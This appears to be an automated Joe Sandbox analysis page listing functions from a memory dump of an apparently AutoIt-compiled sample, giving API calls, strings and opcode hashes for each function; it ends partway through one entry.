Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: fa7f19bc02530a081426c473b0759066dfaf9a8869fba4a7faaa6a001ce2d2f4
Instruction ID: 4add7fc4c3b6cf4e75bf486aeb5edea59da8bc11f213383afb5a39f7370b7959
Opcode Fuzzy Hash: fa7f19bc02530a081426c473b0759066dfaf9a8869fba4a7faaa6a001ce2d2f4
Instruction Fuzzy Hash: 5AF0CD30004A0CDFDB115F16ED4DBA83BA5BB11726F188224E4298A0F1CB355595FF50

Function 00F6C397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00F6C432
CoCreateInstance.OLE32(00F92D6C,00000000,00000001,00F92BDC,?), ref: 00F6C44A

Part of subcall function 00F07DE1: _memmove.LIBCMT ref: 00F07E22

CoUninitialize.OLE32 ref: 00F6C6B7

Strings

.lnk, xrefs: 00F6C3C6, 00F6C3EE, 00F6C3F8

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: b93cfa55a6eb3d1e985b5e298a4302f8f198f53e0b128bb3751fa26de76e806e
Instruction ID: a30dc4e7efcadd1f3dfd271b39b0ab516ed06ddddcb06cfc922d952e98fd3456
Opcode Fuzzy Hash: b93cfa55a6eb3d1e985b5e298a4302f8f198f53e0b128bb3751fa26de76e806e
Instruction Fuzzy Hash: 1DA14BB1108205AFD700EF54CC81EABB7E8FF85354F40491DF595872A2EBB5EA09EB52

Function 00F12CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 00F20DB6: std::exception::exception.LIBCMT ref: 00F20DEC
Part of subcall function 00F20DB6: __CxxThrowException@8.LIBCMT ref: 00F20E01

Part of subcall function 00F07DE1: _memmove.LIBCMT ref: 00F07E22

Part of subcall function 00F07A51: _memmove.LIBCMT ref: 00F07AAB

__swprintf.LIBCMT ref: 00F12ECD

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00F12D66

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: 09d2c29f58fa5eb42c0e395880cc87238696cd3a8888b0f9feb5cbe103a87b98
Instruction ID: cea5ed01b68ec7c6729885fecd5856a1433b4dd7d77bfbd70d800fed1a97ddea
Opcode Fuzzy Hash: 09d2c29f58fa5eb42c0e395880cc87238696cd3a8888b0f9feb5cbe103a87b98
Instruction Fuzzy Hash: 9C918F725083059FCB14EF64DC85CAFB7A8EF85710F00495DF8459B2A2EA78ED84EB52

Function 00F6B93B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 00F04750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F04743,?,?,00F037AE,?), ref: 00F04770

CoInitialize.OLE32(00000000), ref: 00F6B9BB
CoCreateInstance.OLE32(00F92D6C,00000000,00000001,00F92BDC,?), ref: 00F6B9D4
CoUninitialize.OLE32 ref: 00F6B9F1

Part of subcall function 00F09837: __itow.LIBCMT ref: 00F09862
Part of subcall function 00F09837: __swprintf.LIBCMT ref: 00F098AC

Strings

.lnk, xrefs: 00F6B99D, 00F6B9AB

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: 65492adf7b65e9aa072afef4d03387957b5d8f62f51b4a81f87405ed0d198a23
Instruction ID: 03e3b23103a8358b9d0cc1862ba86e002405cd44385f272d8afd9a9891c658e6
Opcode Fuzzy Hash: 65492adf7b65e9aa072afef4d03387957b5d8f62f51b4a81f87405ed0d198a23
Instruction Fuzzy Hash: 6CA179756043059FCB00DF14C884D6ABBE5FF89324F048988F8999B3A2DB35ED85EB91

Function 00F2501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00F250AD

Part of subcall function 00F300F0: __87except.LIBCMT ref: 00F3012B

Strings

pow, xrefs: 00F25085, 00F250A2

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: e5901d96e807c6180d16b275d44c049fdb50d92db5cea582b295603fbd82ea52
Instruction ID: b34b53907a9ff9b81c99d493cc15cdb25f147ed3e9192dc59e529fc1c8721bc8
Opcode Fuzzy Hash: e5901d96e807c6180d16b275d44c049fdb50d92db5cea582b295603fbd82ea52
Instruction Fuzzy Hash: CA517861D1C60696DB11B724ED2137E3B90AB40F30F20895BE4D5862A9EE38CDD4FB86

Function 00F16192 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F16248
_memmove.LIBCMT ref: 00F162E4
_memset.LIBCMT ref: 00F16308

Strings

ERCP, xrefs: 00F161B3

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: _memset$_memmove
String ID: ERCP
API String ID: 2532777613-1384759551
Opcode ID: 6c0a791b945c534a1c006e8fe4e5d42970079d934459c409f2adbf51367bf551
Instruction ID: bbdfb97095c9dfdb171342152ae4a3d0c6d82e43b775ad55c07eb92000a4dbe5
Opcode Fuzzy Hash: 6c0a791b945c534a1c006e8fe4e5d42970079d934459c409f2adbf51367bf551
Instruction Fuzzy Hash: DE51A071A00705DBDB24CF65C981BEAB7F4EF08314F20456EE94AD7241EB74EA84EB50

Function 00F597F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F614BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00F59296,?,?,00000034,00000800,?,00000034), ref: 00F614E6

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00F5983F

Part of subcall function 00F61487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00F592C5,?,?,00000800,?,00001073,00000000,?,?), ref: 00F614B1

Part of subcall function 00F613DE: GetWindowThreadProcessId.USER32(?,?), ref: 00F61409
Part of subcall function 00F613DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00F5925A,00000034,?,?,00001004,00000000,00000000), ref: 00F61419
Part of subcall function 00F613DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00F5925A,00000034,?,?,00001004,00000000,00000000), ref: 00F6142F

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00F598AC
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00F598F9

Strings

@, xrefs: 00F59911

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 03170e3e9c07fb19f4e53c6aaf306c1bc7773a51c76d0287c8e434e83871065b
Instruction ID: 9a46546a5826c1673f149b9c1f2f129ef0a44ffa8fefefed51c2512ada68e166
Opcode Fuzzy Hash: 03170e3e9c07fb19f4e53c6aaf306c1bc7773a51c76d0287c8e434e83871065b
Instruction Fuzzy Hash: E1415176E0021CBFCB14DFA4CC41ADEBBB8EB05300F144159FA45B7141DA746E49DBA0

Function 00F87946 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00F8F910,00000000,?,?,?,?), ref: 00F879DF
GetWindowLongW.USER32 ref: 00F879FC
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00F87A0C

Strings

SysTreeView32, xrefs: 00F879B1

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: e8a0ccef2052e02008a15c6a63460f881005f9eb74a26f116738bcaa3fd19058
Instruction ID: ab80116afd2f5fc0678988b5af13a2bc363a238dcb3c31ecc04d1159e593c8e9
Opcode Fuzzy Hash: e8a0ccef2052e02008a15c6a63460f881005f9eb74a26f116738bcaa3fd19058
Instruction Fuzzy Hash: 9D31CE3160420AAFDB15AF38CC45BEB77A9EB05334F244725F875A22E0D734E991AB60

Function 00F873D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00F87461
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00F87475
SendMessageW.USER32(?,00001002,00000000,?), ref: 00F87499

Strings

SysMonthCal32, xrefs: 00F8742C

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: 9a2adda98e46be9c6283e945e48dbac84a543ef8ff0679a48a7d8bb283d89692
Instruction ID: 73eeef06359cc3687770bbfe1db89de8c3831dbb02f3e6131f03d9e95c728214
Opcode Fuzzy Hash: 9a2adda98e46be9c6283e945e48dbac84a543ef8ff0679a48a7d8bb283d89692
Instruction Fuzzy Hash: 4F219132500218AFDF11EF94CC46FEA3B69EF48724F210214FE156B1D0DA75EC95ABA0

Function 00F87B93 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00F87C4A
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00F87C58
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00F87C5F

Strings

msctls_updown32, xrefs: 00F87BC4

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 6631ca0e834ee8013283324c85c298b13aa8537b0c357c46a1c194339d1c7740
Instruction ID: dc2e3514e1a3ee145db52deb5eac2c63aeb2036123a9651ff5445b008e8d5d9a
Opcode Fuzzy Hash: 6631ca0e834ee8013283324c85c298b13aa8537b0c357c46a1c194339d1c7740
Instruction Fuzzy Hash: 3D215EB5604209AFDB11EF24DCC2DA777EDEF4A764B240059FA019B3A1CB71EC51AB60

Function 00F86CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00F86D3B
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00F86D4B
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00F86D70

Strings

Listbox, xrefs: 00F86D08

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 8bdd0682a299f7397988808d31649966c7a8a5ee9641b5fb3b31ef61f3783efe
Instruction ID: 1c0468c194a18ebb74abb5407bf85c1a785785651144570489e9df45150ff3ff
Opcode Fuzzy Hash: 8bdd0682a299f7397988808d31649966c7a8a5ee9641b5fb3b31ef61f3783efe
Instruction Fuzzy Hash: 7A219232A10118BFDF129F54DC45FFB3BBAEF89760F118124F9459B1A0CA71AC51ABA0

Function 00F8770E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00F87772
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00F87787
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00F87794

Strings

msctls_trackbar32, xrefs: 00F87749

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: d3feb1258f86b59743edca54e8f61c1417517936dc955f67a9360426ec85ff58
Instruction ID: c64c4d09b92263b6ffcddb2c674b05008093ae3f0f81ed01076437c5c634c19a
Opcode Fuzzy Hash: d3feb1258f86b59743edca54e8f61c1417517936dc955f67a9360426ec85ff58
Instruction Fuzzy Hash: 0B110A72654309BFEF106F65CC05FEB7769EF89B64F114118F641960D0D671E851EB20

Function 00F04C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00F04B83,?), ref: 00F04C44
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00F04C56

Strings

kernel32.dll, xrefs: 00F04C3F
Wow64RevertWow64FsRedirection, xrefs: 00F04C50

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: 0fc22282d941b3f467a94b3d52e0591d684ed033876cbbc86b1b06f5a952dfe3
Instruction ID: a142311eb13fd290619b5032ed7e80fc481f908a933a33f7bf25dbe1af90bf06
Opcode Fuzzy Hash: 0fc22282d941b3f467a94b3d52e0591d684ed033876cbbc86b1b06f5a952dfe3
Instruction Fuzzy Hash: C1D0C770A00B13CFEB209F32C80C29A72E4AF00765B10C83E95A2C61A0E670E8C0EB20

Function 00F04C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00F04BD0,?,00F04DEF,?,00FC52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00F04C11
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00F04C23

Strings

kernel32.dll, xrefs: 00F04C0C
Wow64DisableWow64FsRedirection, xrefs: 00F04C1D

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: b0aa332603c99338e29b352b54c86c187dd5fa31d9c545c13d852f7f4d73ed11
Instruction ID: 73108f2fb340e063aa4e1fe72ec6bc778e51966560beaeeb2fe84362a756f6a4
Opcode Fuzzy Hash: b0aa332603c99338e29b352b54c86c187dd5fa31d9c545c13d852f7f4d73ed11
Instruction Fuzzy Hash: 8AD0C270900B13CFD7206F71C90C28AB6D5EF08766B00CC3A9481C2290E6B0D480EB11

Function 00F80DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,00F81039), ref: 00F80DF5
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00F80E07

Strings

advapi32.dll, xrefs: 00F80DF0
RegDeleteKeyExW, xrefs: 00F80E01

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: c9d52151af70d153d3eb405cf10d258a39b6fb4948596fe1e46ea79609810dab
Instruction ID: 5a0978e2531be394158e09e29b95faca401860b617d9047ba41500c4d206e55d
Opcode Fuzzy Hash: c9d52151af70d153d3eb405cf10d258a39b6fb4948596fe1e46ea79609810dab
Instruction Fuzzy Hash: 4ED0C730940B26CFC320AF72C80C2C372E4AF04362F448C3E9582C2150EAB0D894EB00

Function 00F790E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

